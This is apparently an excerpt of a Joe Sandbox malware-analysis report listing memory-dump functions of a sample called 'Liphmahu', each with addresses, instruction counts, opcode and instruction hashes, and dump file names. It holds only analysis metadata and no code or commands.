Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a673c67a0e281a8a37ad0e05ab42ad9833d823ad3454b393d5502f2ff004f218
Instruction ID: 476a863c8028ddcd0d15812c9397f8303fe05a241a34f1c421c1b4d9dcd643b9
Opcode Fuzzy Hash: a673c67a0e281a8a37ad0e05ab42ad9833d823ad3454b393d5502f2ff004f218
Instruction Fuzzy Hash: 882192346103069FC704EB6CD8557AEBBF6EB84300F40853AE01AD7795DE71990A8BA1

Function 008CD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2192013683.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8cd000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a30f8f36898b631c6ec3de07c4b45761c494f3e2985b08e9d7ef22da7def3686
Instruction ID: 8fa9ef9efa9f8affba76d08a0f752bf0ab21bb86329e389559415bd684ce3e9d
Opcode Fuzzy Hash: a30f8f36898b631c6ec3de07c4b45761c494f3e2985b08e9d7ef22da7def3686
Instruction Fuzzy Hash: DB21BD71604704DFCB14EF18D984F26BBA5FB84318F20C57DD84A8B296C33AD846CA61

Function 05D65FB8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f87b42dd9bafe5dc9e162b7080b8d0f8fff87f917a53a8156b8a51849b67315a
Instruction ID: 8743aa74674db7d57106345f8b5169a9e69bae617c458cb2c82b51bde8ddea8f
Opcode Fuzzy Hash: f87b42dd9bafe5dc9e162b7080b8d0f8fff87f917a53a8156b8a51849b67315a
Instruction Fuzzy Hash: 9421D771A002098FDB05DF98DA45ADDB7F2FB48300F1041A5E405AB3A1CB759D85CBA0

Function 05D61A12 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 726103ebe7805c8da40e634761b44638006d3d0743ab56c1c200aaa6d40975e1
Instruction ID: f6051eefff0fa8d0bb48735a0dfcb286904a11453f03d6a63c4f9e50f28aca30
Opcode Fuzzy Hash: 726103ebe7805c8da40e634761b44638006d3d0743ab56c1c200aaa6d40975e1
Instruction Fuzzy Hash: E5F0E7AB40FBD43FDB0362784D256DA2F7B9A3715070E41D3F082CA0A7D2195A5AC37A

Function 05D4ADEA Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc7c4e0b51fc2b546496097c4c1229d538cc501acef1a99f9b14e57742187714
Instruction ID: 95ac1195456ece8559304bf7dd77f19661fd024a986ef27d0d70a7fdc3ae42ae
Opcode Fuzzy Hash: cc7c4e0b51fc2b546496097c4c1229d538cc501acef1a99f9b14e57742187714
Instruction Fuzzy Hash: B031E770A45108CFDB54EFA8D8447ADBBF2FB59701F5080AAE509AB355DB309D85CF11

Function 05D441C0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b4bc43e22bc4d4b12d1d073b18452f4e9d83d3ded95857cd31b8c9f3db473a
Instruction ID: 22634b10da546a766db1b60d82c78216878cbad9c0214452d71878bcab25e2c4
Opcode Fuzzy Hash: b8b4bc43e22bc4d4b12d1d073b18452f4e9d83d3ded95857cd31b8c9f3db473a
Instruction Fuzzy Hash: B321F3B4E04209DFCF04DFA9D4846AEBBB2FB88301F24C16AD415A7254E7349A82CF91

Function 06C7A5A0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82b04ec8cd9384b4a16c7a280d5f96d27be20ad5969916f8aae6a58200149cbb
Instruction ID: c1d8250bddbe5138898e15b033ffdde730b9d93371933b8716262409c6ebd165
Opcode Fuzzy Hash: 82b04ec8cd9384b4a16c7a280d5f96d27be20ad5969916f8aae6a58200149cbb
Instruction Fuzzy Hash: 5E21CD74E0020ACFCB44DFA8C544AEEBBF1EB48211F10846AE419BB354DB35AE41CFA1

Function 008BD49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2191934058.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8bd000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: f53ca7caa980c3ba729f16d6c168103599cc0d21c45953d2e9589b9a543787b9
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 8A11E176504340DFCB12CF04D5C4B56BF71FB94328F24C1A9D9094B256C336D85ACBA2

Function 06C6740B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00283bf16a2c9f88cb9332180e2046956c87bded0c6c24d455a745520d3b5282
Instruction ID: c6ea1f47fa6a001729ecfd457ca26f53729e0d8035bf7573b8efc6b7f5874277
Opcode Fuzzy Hash: 00283bf16a2c9f88cb9332180e2046956c87bded0c6c24d455a745520d3b5282
Instruction Fuzzy Hash: B0318078E142289FDB69DF28C984AD9BBF2FB49305F1081D5EA08A7355D770AE80CF50

Function 05D4EF00 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ce017222291c93f2bb2916bcae6b6d44572d0a6d4a065b2cd8ed043cf1956c0
Instruction ID: ff851c3228744446a4bd56887180f4974c1293e6eb9c6f1124ca97f14a42bc46
Opcode Fuzzy Hash: 3ce017222291c93f2bb2916bcae6b6d44572d0a6d4a065b2cd8ed043cf1956c0
Instruction Fuzzy Hash: 78116A7AB10301AFCB25CE6898457AABBB6BB88200F14402BF455D7380EB31C8068BA1

Function 05D4EC81 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf565df16ba10c425ff2567bfe1f9ea2d6e8efa57b887f6c6e3a79c637c6c2c
Instruction ID: ac5293b0812c93a5996ae0deebc11b89cdd43c734a6fae13fe59c4f20eff06ff
Opcode Fuzzy Hash: 0cf565df16ba10c425ff2567bfe1f9ea2d6e8efa57b887f6c6e3a79c637c6c2c
Instruction Fuzzy Hash: 99214978A42659AFCB04CFA8D594EADBBB6FF49300F244059F902EB365CB34AD41CB51

Function 05D4EF10 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40d91fd2b82543ec7e24d6f8222247ffb514b011dad0d47a96f7995b96c62002
Instruction ID: fc975a6ffc8d1ada550f52b89e4ec137101d1710e6ba22cf12288f1f9187b092
Opcode Fuzzy Hash: 40d91fd2b82543ec7e24d6f8222247ffb514b011dad0d47a96f7995b96c62002
Instruction Fuzzy Hash: 34114C35B003059FCB619A6898557AABBFABB88710F14402AF945D7380EA71D9428BA1

Function 05D4AE67 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fee15f9d065bdbb9c1fbde4b4832020927ebaecb4183b03c936807b48465195
Instruction ID: 2923fcb2b3b61b0def211f6b48eb36cf070539b1c5a8d85fedc3eeb256f48f4d
Opcode Fuzzy Hash: 2fee15f9d065bdbb9c1fbde4b4832020927ebaecb4183b03c936807b48465195
Instruction Fuzzy Hash: B3211570A84608DFDB14EFA8D8447ADBBF2FB59300F5080AAD05AAB254DB309989CF01

Function 008CD113 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2192013683.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8cd000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
Instruction ID: 2558b47a9ec0004c35c7c059e93920497b5cc48d2b0c460cbc7761681d301550
Opcode Fuzzy Hash: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
Instruction Fuzzy Hash: FC11AC76504280CFCB02DF14D9C4B16FF71FB84314F28C2AAD8094B656C33AD81ACBA2

Function 05D4FBB0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6058510b8f24281ae496d93725a2bf75e43caa15787242774b8c00ad09bb0473
Instruction ID: e55a97c932a1f864ee9d211d719738d2d8c236dcec7ff059b61be584deeb84fd
Opcode Fuzzy Hash: 6058510b8f24281ae496d93725a2bf75e43caa15787242774b8c00ad09bb0473
Instruction Fuzzy Hash: ED01F5326082595FD754DB99E040AEBBFE8FB45221F2880ABE484C72A0D631D990CB50

Function 008CD017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2192013683.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8cd000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 1bb1900ab74dc51c65a51ef3627346060adc52d8c2ac09c88c92919294a60d6b
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: E911BB75504780DFCB11DF18D5C4B16BBB2FB84314F24C6AED8498B656C33AD80ACBA2

Function 05D60238 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2896d3ed874c7313abefb5b493ab8ea2eb1c5aabf47d021a6450dc2cbe6df1f4
Instruction ID: bc5d04adc18e71f815ba77ee36a248cae527a98c60102e6cdc039f44f1abde29
Opcode Fuzzy Hash: 2896d3ed874c7313abefb5b493ab8ea2eb1c5aabf47d021a6450dc2cbe6df1f4
Instruction Fuzzy Hash: 8A115271E0010A9FCB04DF99C8815AFFBBAFF88310B14853AD519A7355EB31AD4A8BD1

Function 05D4B547 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e87adf8db4810dba2dc1119d69d3d2dde0815cfee509d93660f647aa535b059
Instruction ID: 5185677399e860728c81f8e26c1d2182990988befcf9db0e2d0184a7dc4bd11a
Opcode Fuzzy Hash: 0e87adf8db4810dba2dc1119d69d3d2dde0815cfee509d93660f647aa535b059
Instruction Fuzzy Hash: E721B2359052189FEB54EFA8D844B9D7BF2FB49315F5081AAE409BB344DB349E84CF10

Function 05D4EB60 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c811fb917a37b22ef0a85a3f4adb354e24cf27fa10c7c1494b426ccfbb2fd13
Instruction ID: 4c8d43bf2eb34a23d27751f860cd2d44295c88e7dceeb718201466e8ad2f0a85
Opcode Fuzzy Hash: 1c811fb917a37b22ef0a85a3f4adb354e24cf27fa10c7c1494b426ccfbb2fd13
Instruction Fuzzy Hash: C9014836350315AFDB108E59DC95F9FB7A9FB89721F108067FA15CB390CA71D8158B50

Function 05D60367 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f7a1ee8ac73f1db1dbd56024532d59a3a86408579e26201613384044ecdaf16
Instruction ID: 7b35e62f16d9fc897152d0851eedfff3acfdc816d311742e623c0a93772126e6
Opcode Fuzzy Hash: 7f7a1ee8ac73f1db1dbd56024532d59a3a86408579e26201613384044ecdaf16
Instruction Fuzzy Hash: 28012436205205AFC701EB18D4549DD7F66EF86324B04809BF4088F321DB72AD47CBD0

Function 05D64AA0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fb7d6af9e1e593feacb47dc21d0655511dbc226dd9d4cfa5bf73d4c075d1452
Instruction ID: c2cbc920374554d96879143fd1fdca8edbe5d451ff992368b64d7135657bdc09
Opcode Fuzzy Hash: 0fb7d6af9e1e593feacb47dc21d0655511dbc226dd9d4cfa5bf73d4c075d1452
Instruction Fuzzy Hash: 1911C976A001189BCB15CF99D8809DEB7F9EF48350B158167E905E7324EA31E906CB90

Function 05D6D47A Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aea53b2b0e3c266f085a97953c8b3520f0b64594279198ed2bf8198ec32c9b5
Instruction ID: 0a200b439e92943c3c68aec13014b6aca2966efdc39ce989186bdd42b65462a7
Opcode Fuzzy Hash: 7aea53b2b0e3c266f085a97953c8b3520f0b64594279198ed2bf8198ec32c9b5
Instruction Fuzzy Hash: 5A019E313003049FC728AB34E854B2A77A3EBC9324F14856AD9568B7A4CB72FC439B90

Function 06C7F330 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5de810719a1a649d1cb7f2ceecb012f9688b2e6d2383c4baeb26ed64056194a
Instruction ID: d5de7a1170eba8a02439814b579f134f368e4c6dad52e79e492074da47b06ddd
Opcode Fuzzy Hash: d5de810719a1a649d1cb7f2ceecb012f9688b2e6d2383c4baeb26ed64056194a
Instruction Fuzzy Hash: 3811B7B0E002199FCB44DFA9C9456BFBBF5FF88300F20846A9418E7354EA359A418F91

Function 008BD76D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2191934058.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8bd000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d69b1030f1136c7a95d1a05d3fb38f231231cc8fa3c34b98d3af70f944665227
Instruction ID: c231a7b2c0f1f224ea92865d56b485e4b8797c610d09532fd84544669b079c49
Opcode Fuzzy Hash: d69b1030f1136c7a95d1a05d3fb38f231231cc8fa3c34b98d3af70f944665227
Instruction Fuzzy Hash: 1501A771009744BAE7104A15D9C4BE7BFD8FF41324F18C569ED098A386DA79D840C6B5

Function 05D6022A Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78b8e7f8d77bf5d891618d5c6cfce136c676d18ef9376273b5462497e937b399
Instruction ID: a87a4e2a3ce70ae6b26199fe87e447392c2e5bd3ceffa883c4c241df59643613
Opcode Fuzzy Hash: 78b8e7f8d77bf5d891618d5c6cfce136c676d18ef9376273b5462497e937b399
Instruction Fuzzy Hash: 5601B175A0420AAFCB00DB98D8409EFBFBAFF49314B14416AE508A7351D731AD1AC7E1

Function 05D6D488 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c426edc3caabaf0ca293e92f115573c851b5b5b75f57b1485e9cab6b548a1071
Instruction ID: bb3d794b6bc4f525f6a826484ad44b542d5de7f3fa969d8eb6992336e937a643
Opcode Fuzzy Hash: c426edc3caabaf0ca293e92f115573c851b5b5b75f57b1485e9cab6b548a1071
Instruction Fuzzy Hash: 77015A303003049FC729AA24E454A2A77A3EBC9320F54866ED5568B7A8CB76FC43DB90

Function 06C6252A Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6049e23b666559521314b00acd8ef32d1c87f54ed55e1ed02234b01f484250a
Instruction ID: 6a9777953e4ae97522f0af42ba89af8d8216b65c076ea870b4eefdf82ddd2bee
Opcode Fuzzy Hash: f6049e23b666559521314b00acd8ef32d1c87f54ed55e1ed02234b01f484250a
Instruction Fuzzy Hash: 6711F974A0412DCFEBA4DF55C898BA9B7B1EB45308F1081E9E419B7640DB749EC8CF15

Function 05D441B0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5303f9d8429ccf83202df1e9479496ee5496b6984f49004f954ca816fa9b99fa
Instruction ID: 8c4135ce6ebc4484c1179aa6297f01614f803382c48800c486dfa6582f88295d
Opcode Fuzzy Hash: 5303f9d8429ccf83202df1e9479496ee5496b6984f49004f954ca816fa9b99fa
Instruction Fuzzy Hash: 4E0113B0D052099FDB44CFAAD8843AEBFF6FB89300F14816AD009E3200E7304A81CF81

Function 05D6AF89 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d7137d10c1bdce4fb7b79d5ea0db68dffb538e6fb171a8571e15f7d0fbd910f
Instruction ID: fc2d0598cfeadc9f77407a817e9c4465a960741146b55e50cf4c226f8d7c67f8
Opcode Fuzzy Hash: 4d7137d10c1bdce4fb7b79d5ea0db68dffb538e6fb171a8571e15f7d0fbd910f
Instruction Fuzzy Hash: F1011D35301714DFCB05AB69D56995ABBA2EBCD711B10816AE90A8B3A4CF35EC03CB90

Function 05D67961 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0c2f52eef4cbb03a56d47aa5302090cafcaaf4c249c12b23a89b157017f2f09
Instruction ID: 0a530cb7b518453b12db547c540ad9e5975e1857c1e79b123b6a8fd8a9a5cf1f
Opcode Fuzzy Hash: d0c2f52eef4cbb03a56d47aa5302090cafcaaf4c249c12b23a89b157017f2f09
Instruction Fuzzy Hash: A0F02B337101096BCB149A19D855DEAF7A9EF84260F048037ED15D7360DE719C17C790

Function 05D4DF81 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 899e8c1988f9a8b6b807d04321e5d623900c46be5bfa243b9bacb8021c3a418e
Instruction ID: a8f69fd6c7b074031163afc9874d8b9d5e839031b14ba2dc16e60522e7fad146
Opcode Fuzzy Hash: 899e8c1988f9a8b6b807d04321e5d623900c46be5bfa243b9bacb8021c3a418e
Instruction Fuzzy Hash: 1DF0FC32B492515FE714DA28985476BF7E7EBC8320F18446BE5059B350CB62AC42C790

Function 05D4AB44 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3714926d65438cbb40341fae4c26916eb7740b02221af2c84f0c2daec7bfaca4
Instruction ID: 02194b26ae72b8695be044577dcedf0e6dca11359cdec6edace45feae4041f7d
Opcode Fuzzy Hash: 3714926d65438cbb40341fae4c26916eb7740b02221af2c84f0c2daec7bfaca4
Instruction Fuzzy Hash: 5F11D274A05218CFEB54EF98D884B9DBBF2FB58710F1041AAA509BB344DB709E84CF11

Function 05D6EC7A Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e4948b96e57446c0720ee7942c0f6bcdac65bd34317af32ac7eab8347583ecb
Instruction ID: c03db5187ae73829b65ddf4718f12f3ba1094fe35f6d14502a1367014d43aab7
Opcode Fuzzy Hash: 0e4948b96e57446c0720ee7942c0f6bcdac65bd34317af32ac7eab8347583ecb
Instruction Fuzzy Hash: 01F0223AB103189FDB04EA24D8697AEB766EBC8611F10803BE905A7384CE729D07C790

Function 05D6DAE1 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02920c1d9777a67d4f5bafa0caa832997deb1ee2155759cd4491c923d8efcd34
Instruction ID: 55db3437745d1be62e0dd147464812d882feda4ae1002b84548018674720b07f
Opcode Fuzzy Hash: 02920c1d9777a67d4f5bafa0caa832997deb1ee2155759cd4491c923d8efcd34
Instruction Fuzzy Hash: F9F090313043468FDB156A39E916B6932B7EB41292F9840BBE8028B784DA66E802C764

Function 05D6AD08 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b19111ccafaf68f8c9407390154e675b58b8731a21c469245e534490e662baae
Instruction ID: 4a8d21ed37d29ee8b7f68c6a08a9bfe24aae63d20d7ab4a3ac57670cb92487da
Opcode Fuzzy Hash: b19111ccafaf68f8c9407390154e675b58b8731a21c469245e534490e662baae
Instruction Fuzzy Hash: 7EF06D363103009FC7049B29D855E6A77A6EFC9721F1480AAF9068B370CE32EC42DB90

Function 05D6AF90 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81cc4183140ff6001674a2d73d83720f8e386b14c590ee0e0b074dd170c2c232
Instruction ID: a0210ba6134d42687ba37309b6fb3932c2ceb16566270bf6a9eb4fe89b8260ac
Opcode Fuzzy Hash: 81cc4183140ff6001674a2d73d83720f8e386b14c590ee0e0b074dd170c2c232
Instruction Fuzzy Hash: D2013135301614DFC705AB69D468D5ABBA2EBCD711B10816AE90A8B3A4CF35EC02CBD0

Function 05D43D48 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfd98960fcff3fa1a3d869220b362a234bff734c638aa00606f924cf5ca0517c
Instruction ID: 0c9d2d9c6a53138dad4f834b407ef3a41fbcf3d0899f72e313a3b44fc2b28231
Opcode Fuzzy Hash: dfd98960fcff3fa1a3d869220b362a234bff734c638aa00606f924cf5ca0517c
Instruction Fuzzy Hash: 5201E871D05209DFCB44DFA8D5442ADBBF4FB48301F1085AAD45AE3280E7305B41CF91

Function 05D4DFE8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
